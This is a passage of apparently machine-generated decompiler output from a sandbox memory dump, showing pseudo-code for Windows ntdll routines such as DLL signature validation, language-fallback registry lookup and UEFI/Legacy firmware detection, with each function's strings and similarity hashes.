                                                                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                              					 *(_t125 + 0x34) = _t73;
                                                                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                              						goto L3;
                                                                              					}
                                                                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                              					_t124 = E0173C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                              					if(_t124 < 0) {
                                                                              						goto L8;
                                                                              					} else {
                                                                              						goto L3;
                                                                              					}
                                                                              				} else {
                                                                              					L3:
                                                                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                              						L8:
                                                                              						return _t124;
                                                                              					}
                                                                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                              							goto L5;
                                                                              						}
                                                                              						_t102 =  *0x1825780; // 0x0
                                                                              						if((_t102 & 0x00000003) != 0) {
                                                                              							E017B5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                              							_t102 =  *0x1825780; // 0x0
                                                                              						}
                                                                              						if((_t102 & 0x00000010) != 0) {
                                                                              							asm("int3");
                                                                              						}
                                                                              						_t124 = 0xc0000428;
                                                                              						goto L8;
                                                                              					}
                                                                              					L5:
                                                                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                              						goto L8;
                                                                              					}
                                                                              					_t77 = _a4 - 0x40000003;
                                                                              					if(_t77 == 0 || _t77 == 0x33) {
                                                                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                              						if(E01757D50() != 0) {
                                                                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                              						} else {
                                                                              							_t82 = 0x7ffe0384;
                                                                              						}
                                                                              						_t108 = 0x7ffe0385;
                                                                              						if( *_t82 != 0) {
                                                                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                              								if(E01757D50() == 0) {
                                                                              									_t97 = 0x7ffe0385;
                                                                              								} else {
                                                                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                              								}
                                                                              								if(( *_t97 & 0x00000020) != 0) {
                                                                              									E017B7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						if(_a4 != 0x40000003) {
                                                                              							L14:
                                                                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                              							if(E01757D50() != 0) {
                                                                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                              							} else {
                                                                              								_t87 = 0x7ffe0384;
                                                                              							}
                                                                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                              								if(E01757D50() != 0) {
                                                                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                              								}
                                                                              								if(( *_t108 & 0x00000020) != 0) {
                                                                              									E017B7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                              								}
                                                                              							}
                                                                              							goto L8;
                                                                              						} else {
                                                                              							_v16 = _t125 + 0x24;
                                                                              							_t124 = E0176A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                              							if(_t124 < 0) {
                                                                              								E0173B1E1(_t124, 0x1490, 0, _v16);
                                                                              								goto L8;
                                                                              							}
                                                                              							goto L14;
                                                                              						}
                                                                              					} else {
                                                                              						goto L8;
                                                                              					}
                                                                              				}
                                                                              			}




















                                                                              0x01799975
                                                                              0x01799975
                                                                              0x0179997e
                                                                              0x01799993
                                                                              0x01799993
                                                                              0x0179997e
                                                                              0x00000000
                                                                              0x01747ef2
                                                                              0x01747efc
                                                                              0x01747f0a
                                                                              0x01747f0e
                                                                              0x01799933
                                                                              0x00000000
                                                                              0x01799933
                                                                              0x00000000
                                                                              0x01747f0e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01747eb1

                                                                              Strings
                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 017998A2
                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 01799891
                                                                              • LdrpCompleteMapModule, xrefs: 01799898
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                              • API String ID: 0-1676968949
                                                                              • Opcode ID: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                              • Instruction ID: d6eb9ba34fec9a99016bf9d9874609c7bce81d4c8cf3171309d0c1f74906b6fe
                                                                              • Opcode Fuzzy Hash: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                              • Instruction Fuzzy Hash: 8951F031600742DFEB3ACB6CC984B6AFBE4AB48314F040699EA519B7D1D770ED01CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 93%
                                                                              			E0173E620(void* __ecx, short* __edx, short* _a4) {
                                                                              				char _v16;
                                                                              				char _v20;
                                                                              				intOrPtr _v24;
                                                                              				char* _v28;
                                                                              				char _v32;
                                                                              				char _v36;
                                                                              				char _v44;
                                                                              				signed int _v48;
                                                                              				intOrPtr _v52;
                                                                              				void* _v56;
                                                                              				void* _v60;
                                                                              				char _v64;
                                                                              				void* _v68;
                                                                              				void* _v76;
                                                                              				void* _v84;
                                                                              				signed int _t59;
                                                                              				signed int _t74;
                                                                              				signed short* _t75;
                                                                              				signed int _t76;
                                                                              				signed short* _t78;
                                                                              				signed int _t83;
                                                                              				short* _t93;
                                                                              				signed short* _t94;
                                                                              				short* _t96;
                                                                              				void* _t97;
                                                                              				signed int _t99;
                                                                              				void* _t101;
                                                                              				void* _t102;
                                                                              
                                                                              				_t80 = __ecx;
                                                                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                              				_t96 = __edx;
                                                                              				_v44 = __edx;
                                                                              				_t78 = 0;
                                                                              				_v56 = 0;
                                                                              				if(__ecx == 0 || __edx == 0) {
                                                                              					L28:
                                                                              					_t97 = 0xc000000d;
                                                                              				} else {
                                                                              					_t93 = _a4;
                                                                              					if(_t93 == 0) {
                                                                              						goto L28;
                                                                              					}
                                                                              					_t78 = E0173F358(__ecx, 0xac);
                                                                              					if(_t78 == 0) {
                                                                              						_t97 = 0xc0000017;
                                                                              						L6:
                                                                              						if(_v56 != 0) {
                                                                              							_push(_v56);
                                                                              							E017795D0();
                                                                              						}
                                                                              						if(_t78 != 0) {
                                                                              							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                              						}
                                                                              						return _t97;
                                                                              					}
                                                                              					E0177FA60(_t78, 0, 0x158);
                                                                              					_v48 = _v48 & 0x00000000;
                                                                              					_t102 = _t101 + 0xc;
                                                                              					 *_t96 = 0;
                                                                              					 *_t93 = 0;
                                                                              					E0177BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                              					_v36 = 0x18;
                                                                              					_v28 =  &_v44;
                                                                              					_v64 = 0;
                                                                              					_push( &_v36);
                                                                              					_push(0x20019);
                                                                              					_v32 = 0;
                                                                              					_push( &_v64);
                                                                              					_v24 = 0x40;
                                                                              					_v20 = 0;
                                                                              					_v16 = 0;
                                                                              					_t97 = E01779600();
                                                                              					if(_t97 < 0) {
                                                                              						goto L6;
                                                                              					}
                                                                              					E0177BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                              					_push(0);
                                                                              					_v48 = 4;
                                                                              					_t97 = L0173F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                              					if(_t97 >= 0) {
                                                                              						if(_v52 != 1) {
                                                                              							L17:
                                                                              							_t97 = 0xc0000001;
                                                                              							goto L6;
                                                                              						}
                                                                              						_t59 =  *_t78 & 0x0000ffff;
                                                                              						_t94 = _t78;
                                                                              						_t83 = _t59;
                                                                              						if(_t59 == 0) {
                                                                              							L19:
                                                                              							if(_t83 == 0) {
                                                                              								L23:
                                                                              								E0177BB40(_t83, _t102 + 0x24, _t78);
                                                                              								if(L017443C0( &_v48,  &_v64) == 0) {
                                                                              									goto L17;
                                                                              								}
                                                                              								_t84 = _v48;
                                                                              								 *_v48 = _v56;
                                                                              								if( *_t94 != 0) {
                                                                              									E0177BB40(_t84, _t102 + 0x24, _t94);
                                                                              									if(L017443C0( &_v48,  &_v64) != 0) {
                                                                              										 *_a4 = _v56;
                                                                              									} else {
                                                                              										_t97 = 0xc0000001;
                                                                              										 *_v48 = 0;
                                                                              									}
                                                                              								}
                                                                              								goto L6;
                                                                              							}
                                                                              							_t83 = _t83 & 0x0000ffff;
                                                                              							while(_t83 == 0x20) {
                                                                              								_t94 =  &(_t94[1]);
                                                                              								_t74 =  *_t94 & 0x0000ffff;
                                                                              								_t83 = _t74;
                                                                              								if(_t74 != 0) {
                                                                              									continue;
                                                                              								}
                                                                              								goto L23;
                                                                              							}
                                                                              							goto L23;
                                                                              						} else {
                                                                              							goto L14;
                                                                              						}
                                                                              						while(1) {
                                                                              							L14:
                                                                              							_t27 =  &(_t94[1]); // 0x2
                                                                              							_t75 = _t27;
                                                                              							if(_t83 == 0x2c) {
                                                                              								break;
                                                                              							}
                                                                              							_t94 = _t75;
                                                                              							_t76 =  *_t94 & 0x0000ffff;
                                                                              							_t83 = _t76;
                                                                              							if(_t76 != 0) {
                                                                              								continue;
                                                                              							}
                                                                              							goto L23;
                                                                              						}
                                                                              						 *_t94 = 0;
                                                                              						_t94 = _t75;
                                                                              						_t83 =  *_t75 & 0x0000ffff;
                                                                              						goto L19;
                                                                              					}
                                                                              				}
                                                                              			}

                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0173E68C
                                                                              • @, xrefs: 0173E6C0
                                                                              • InstallLanguageFallback, xrefs: 0173E6DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                              • API String ID: 0-1757540487
                                                                              • Opcode ID: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                              • Instruction ID: ac74e9e49e8f8a8f5132b83b451f0a2a282221485ac2ecaddbb54d9a812e6d4d
                                                                              • Opcode Fuzzy Hash: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                              • Instruction Fuzzy Hash: A451E3B25043169BDB12DF28D444A6BF7E8BF88754F04092EFA85E7251FB34D908C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 60%
                                                                              			E017FE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                              				signed int _v20;
                                                                              				char _v24;
                                                                              				signed int _v40;
                                                                              				char _v44;
                                                                              				intOrPtr _v48;
                                                                              				signed int _v52;
                                                                              				unsigned int _v56;
                                                                              				char _v60;
                                                                              				signed int _v64;
                                                                              				char _v68;
                                                                              				signed int _v72;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				char _t87;
                                                                              				signed int _t90;
                                                                              				signed int _t94;
                                                                              				signed int _t100;
                                                                              				intOrPtr* _t113;
                                                                              				signed int _t122;
                                                                              				void* _t132;
                                                                              				void* _t135;
                                                                              				signed int _t139;
                                                                              				signed int* _t141;
                                                                              				signed int _t146;
                                                                              				signed int _t147;
                                                                              				void* _t153;
                                                                              				signed int _t155;
                                                                              				signed int _t159;
                                                                              				char _t166;
                                                                              				void* _t172;
                                                                              				void* _t176;
                                                                              				signed int _t177;
                                                                              				intOrPtr* _t179;
                                                                              
                                                                              				_t179 = __ecx;
                                                                              				_v48 = __edx;
                                                                              				_v68 = 0;
                                                                              				_v72 = 0;
                                                                              				_push(__ecx[1]);
                                                                              				_push( *__ecx);
                                                                              				_push(0);
                                                                              				_t153 = 0x14;
                                                                              				_t135 = _t153;
                                                                              				_t132 = E017FBBBB(_t135, _t153);
                                                                              				if(_t132 == 0) {
                                                                              					_t166 = _v68;
                                                                              					goto L43;
                                                                              				} else {
                                                                              					_t155 = 0;
                                                                              					_v52 = 0;
                                                                              					asm("stosd");
                                                                              					asm("stosd");
                                                                              					asm("stosd");
                                                                              					asm("stosd");
                                                                              					asm("stosd");
                                                                              					_v56 = __ecx[1];
                                                                              					if( *__ecx >> 8 < 2) {
                                                                              						_t155 = 1;
                                                                              						_v52 = 1;
                                                                              					}
                                                                              					_t139 = _a4;
                                                                              					_t87 = (_t155 << 0xc) + _t139;
                                                                              					_v60 = _t87;
                                                                              					if(_t87 < _t139) {
                                                                              						L11:
                                                                              						_t166 = _v68;
                                                                              						L12:
                                                                              						if(_t132 != 0) {
                                                                              							E017FBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                              						}
                                                                              						L43:
                                                                              						if(_v72 != 0) {
                                                                              							_push( *((intOrPtr*)(_t179 + 4)));
                                                                              							_push( *_t179);
                                                                              							_push(0x8000);
                                                                              							E017FAFDE( &_v72,  &_v60);
                                                                              						}
                                                                              						L46:
                                                                              						return _t166;
                                                                              					}
                                                                              					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                              					asm("sbb edi, edi");
                                                                              					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                              					if(_t90 != 0) {
                                                                              						_push(0);
                                                                              						_push(0x14);
                                                                              						_push( &_v44);
                                                                              						_push(3);
                                                                              						_push(_t179);
                                                                              						_push(0xffffffff);
                                                                              						if(E01779730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                              							_push(_t139);
                                                                              							E017FA80D(_t179, 1, _v40, 0);
                                                                              							_t172 = 4;
                                                                              						}
                                                                              					}
                                                                              					_t141 =  &_v72;
                                                                              					if(E017FA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                              						_v64 = _a4;
                                                                              						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                              						asm("sbb edi, edi");
                                                                              						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                              						if(_t94 != 0) {
                                                                              							_push(0);
                                                                              							_push(0x14);
                                                                              							_push( &_v24);
                                                                              							_push(3);
                                                                              							_push(_t179);
                                                                              							_push(0xffffffff);
                                                                              							if(E01779730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                              								_push(_t141);
                                                                              								E017FA80D(_t179, 1, _v20, 0);
                                                                              								_t176 = 4;
                                                                              							}
                                                                              						}
                                                                              						if(E017FA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                              							goto L11;
                                                                              						} else {
                                                                              							_t177 = _v64;
                                                                              							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                              							_t100 = _v52 + _v52;
                                                                              							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                              							 *(_t132 + 0x10) = _t146;
                                                                              							asm("bsf eax, [esp+0x18]");
                                                                              							_v52 = _t100;
                                                                              							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                              							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                              							_t47 =  &_a8;
                                                                              							 *_t47 = _a8 & 0x00000001;
                                                                              							if( *_t47 == 0) {
                                                                              								E01752280(_t179 + 0x30, _t179 + 0x30);
                                                                              							}
                                                                              							_t147 =  *(_t179 + 0x34);
                                                                              							_t159 =  *(_t179 + 0x38) & 1;
                                                                              							_v68 = 0;
                                                                              							if(_t147 == 0) {
                                                                              								L35:
                                                                              								E0174B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                              								if(_a8 == 0) {
                                                                              									E0174FFB0(_t132, _t177, _t179 + 0x30);
                                                                              								}
                                                                              								asm("lock xadd [eax], ecx");
                                                                              								asm("lock xadd [eax], edx");
                                                                              								_t132 = 0;
                                                                              								_v72 = _v72 & 0;
                                                                              								_v68 = _v72;
                                                                              								if(E01757D50() == 0) {
                                                                              									_t113 = 0x7ffe0388;
                                                                              								} else {
                                                                              									_t177 = _v64;
                                                                              									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                              								}
                                                                              								if( *_t113 == _t132) {
                                                                              									_t166 = _v68;
                                                                              									goto L46;
                                                                              								} else {
                                                                              									_t166 = _v68;
                                                                              									E017EFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                              									goto L12;
                                                                              								}
                                                                              							} else {
                                                                              								L23:
                                                                              								while(1) {
                                                                              									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                              										_t122 =  *_t147;
                                                                              										if(_t159 == 0) {
                                                                              											L32:
                                                                              											if(_t122 == 0) {
                                                                              												L34:
                                                                              												_v68 = 0;
                                                                              												goto L35;
                                                                              											}
                                                                              											L33:
                                                                              											_t147 = _t122;
                                                                              											continue;
                                                                              										}
                                                                              										if(_t122 == 0) {
                                                                              											goto L34;
                                                                              										}
                                                                              										_t122 = _t122 ^ _t147;
                                                                              										goto L32;
                                                                              									}
                                                                              									_t122 =  *(_t147 + 4);
                                                                              									if(_t159 == 0) {
                                                                              										L27:
                                                                              										if(_t122 != 0) {
                                                                              											goto L33;
                                                                              										}
                                                                              										L28:
                                                                              										_v68 = 1;
                                                                              										goto L35;
                                                                              									}
                                                                              									if(_t122 == 0) {
                                                                              										goto L28;
                                                                              									}
                                                                              									_t122 = _t122 ^ _t147;
                                                                              									goto L27;
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              					}
                                                                              					_v72 = _v72 & 0x00000000;
                                                                              					goto L11;
                                                                              				}
                                                                              			}




































                                                                              0x017fe75c
                                                                              0x00000000
                                                                              0x017fe75c
                                                                              0x017fe758
                                                                              0x017fe758
                                                                              0x00000000
                                                                              0x017fe758
                                                                              0x017fe750
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fe752
                                                                              0x00000000
                                                                              0x017fe752
                                                                              0x017fe730
                                                                              0x017fe735
                                                                              0x017fe73d
                                                                              0x017fe73f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fe741
                                                                              0x017fe741
                                                                              0x00000000
                                                                              0x017fe741
                                                                              0x017fe739
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fe73b
                                                                              0x00000000
                                                                              0x017fe73b
                                                                              0x017fe722
                                                                              0x017fe720
                                                                              0x017fe6b0
                                                                              0x017fe618
                                                                              0x00000000
                                                                              0x017fe618

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                              • Instruction ID: 0740cdbb995cab34f0e53a99819eeef9d8d997156b215ec6b14116439eff0f5d
                                                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                              • Instruction Fuzzy Hash: 0B915E312043429BE725CE29C845B1BFBE5AF84714F15892DF795CB394EB74E904CB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 77%
                                                                              			E017B51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                              				signed short* _t63;
                                                                              				signed int _t64;
                                                                              				signed int _t65;
                                                                              				signed int _t67;
                                                                              				intOrPtr _t74;
                                                                              				intOrPtr _t84;
                                                                              				intOrPtr _t88;
                                                                              				intOrPtr _t94;
                                                                              				void* _t100;
                                                                              				void* _t103;
                                                                              				intOrPtr _t105;
                                                                              				signed int _t106;
                                                                              				short* _t108;
                                                                              				signed int _t110;
                                                                              				signed int _t113;
                                                                              				signed int* _t115;
                                                                              				signed short* _t117;
                                                                              				void* _t118;
                                                                              				void* _t119;
                                                                              
                                                                              				_push(0x80);
                                                                              				_push(0x18105f0);
                                                                              				E0178D0E8(__ebx, __edi, __esi);
                                                                              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                              				_t115 =  *(_t118 + 0xc);
                                                                              				 *(_t118 - 0x7c) = _t115;
                                                                              				 *((char*)(_t118 - 0x65)) = 0;
                                                                              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                              				_t113 = 0;
                                                                              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                              				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                              				_t100 = __ecx;
                                                                              				if(_t100 == 0) {
                                                                              					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                              					E0174EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                              					 *((char*)(_t118 - 0x65)) = 1;
                                                                              					_t63 =  *(_t118 - 0x90);
                                                                              					_t101 = _t63[2];
                                                                              					_t64 =  *_t63 & 0x0000ffff;
                                                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                              					L20:
                                                                              					_t65 = _t64 >> 1;
                                                                              					L21:
                                                                              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                              					if(_t108 == 0) {
                                                                              						L27:
                                                                              						 *_t115 = _t65 + 1;
                                                                              						_t67 = 0xc0000023;
                                                                              						L28:
                                                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                              						L29:
                                                                              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                              						E017B53CA(0);
                                                                              						return E0178D130(0, _t113, _t115);
                                                                              					}
                                                                              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                              							 *_t108 = 0;
                                                                              						}
                                                                              						goto L27;
                                                                              					}
                                                                              					 *_t115 = _t65;
                                                                              					_t115 = _t65 + _t65;
                                                                              					E0177F3E0(_t108, _t101, _t115);
                                                                              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                              					_t67 = 0;
                                                                              					goto L28;
                                                                              				}
                                                                              				_t103 = _t100 - 1;
                                                                              				if(_t103 == 0) {
                                                                              					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                              					_t74 = E01753690(1, _t117, 0x1711810, _t118 - 0x74);
                                                                              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                              					_t101 = _t117[2];
                                                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                              					if(_t74 < 0) {
                                                                              						_t64 =  *_t117 & 0x0000ffff;
                                                                              						_t115 =  *(_t118 - 0x7c);
                                                                              						goto L20;
                                                                              					}
                                                                              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                              					_t115 =  *(_t118 - 0x7c);
                                                                              					goto L21;
                                                                              				}
                                                                              				if(_t103 == 1) {
                                                                              					_t105 = 4;
                                                                              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                              					_push(_t118 - 0x70);
                                                                              					_push(0);
                                                                              					_push(0);
                                                                              					_push(_t105);
                                                                              					_push(_t118 - 0x78);
                                                                              					_push(0x6b);
                                                                              					 *((intOrPtr*)(_t118 - 0x64)) = E0177AA90();
                                                                              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                              					_t113 = L01754620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                              					if(_t113 != 0) {
                                                                              						_push(_t118 - 0x70);
                                                                              						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                              						_push(_t113);
                                                                              						_push(4);
                                                                              						_push(_t118 - 0x78);
                                                                              						_push(0x6b);
                                                                              						_t84 = E0177AA90();
                                                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                              						if(_t84 < 0) {
                                                                              							goto L29;
                                                                              						}
                                                                              						_t110 = 0;
                                                                              						_t106 = 0;
                                                                              						while(1) {
                                                                              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                              							 *(_t118 - 0x88) = _t106;
                                                                              							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                              								break;
                                                                              							}
                                                                              							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                              							_t106 = _t106 + 1;
                                                                              						}
                                                                              						_t88 = E017B500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                              						_t119 = _t119 + 0x1c;
                                                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                              						if(_t88 < 0) {
                                                                              							goto L29;
                                                                              						}
                                                                              						_t101 = _t118 - 0x3c;
                                                                              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                              						goto L21;
                                                                              					}
                                                                              					_t67 = 0xc0000017;
                                                                              					goto L28;
                                                                              				}
                                                                              				_push(0);
                                                                              				_push(0x20);
                                                                              				_push(_t118 - 0x60);
                                                                              				_push(0x5a);
                                                                              				_t94 = E01779860();
                                                                              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                              				if(_t94 < 0) {
                                                                              					goto L29;
                                                                              				}
                                                                              				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                              					_t101 = L"Legacy";
                                                                              					_push(6);
                                                                              				} else {
                                                                              					_t101 = L"UEFI";
                                                                              					_push(4);
                                                                              				}
                                                                              				_pop(_t65);
                                                                              				goto L21;
                                                                              			}






















                                                                              0x017b5226
                                                                              0x017b522b
                                                                              0x017b521d
                                                                              0x017b521d
                                                                              0x017b5222
                                                                              0x017b5222
                                                                              0x017b522d
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                              • Instruction ID: 987a4dd388b623d827758810d01e16c851817a02aeb56e3b161a3af61a70524a
                                                                              • Opcode Fuzzy Hash: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                              • Instruction Fuzzy Hash: C35169B1A456099FDB25DFA8C880BEEFBF8FB48704F14406DE609EB251DB719941CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 78%
                                                                              			E0173B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                              				signed int _t65;
                                                                              				signed short _t69;
                                                                              				intOrPtr _t70;
                                                                              				signed short _t85;
                                                                              				void* _t86;
                                                                              				signed short _t89;
                                                                              				signed short _t91;
                                                                              				intOrPtr _t92;
                                                                              				intOrPtr _t97;
                                                                              				intOrPtr* _t98;
                                                                              				signed short _t99;
                                                                              				signed short _t101;
                                                                              				void* _t102;
                                                                              				char* _t103;
                                                                              				signed short _t104;
                                                                              				intOrPtr* _t110;
                                                                              				void* _t111;
                                                                              				void* _t114;
                                                                              				intOrPtr* _t115;
                                                                              
                                                                              				_t109 = __esi;
                                                                              				_t108 = __edi;
                                                                              				_t106 = __edx;
                                                                              				_t95 = __ebx;
                                                                              				_push(0x90);
                                                                              				_push(0x180f7a8);
                                                                              				E0178D0E8(__ebx, __edi, __esi);
                                                                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                              				if(__edx == 0xffffffff) {
                                                                              					L6:
                                                                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                              					__eflags = _t65 & 0x00000002;
                                                                              					if((_t65 & 0x00000002) != 0) {
                                                                              						L3:
                                                                              						L4:
                                                                              						return E0178D130(_t95, _t108, _t109);
                                                                              					}
                                                                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                              					_t108 = 0;
                                                                              					_t109 = 0;
                                                                              					_t95 = 0;
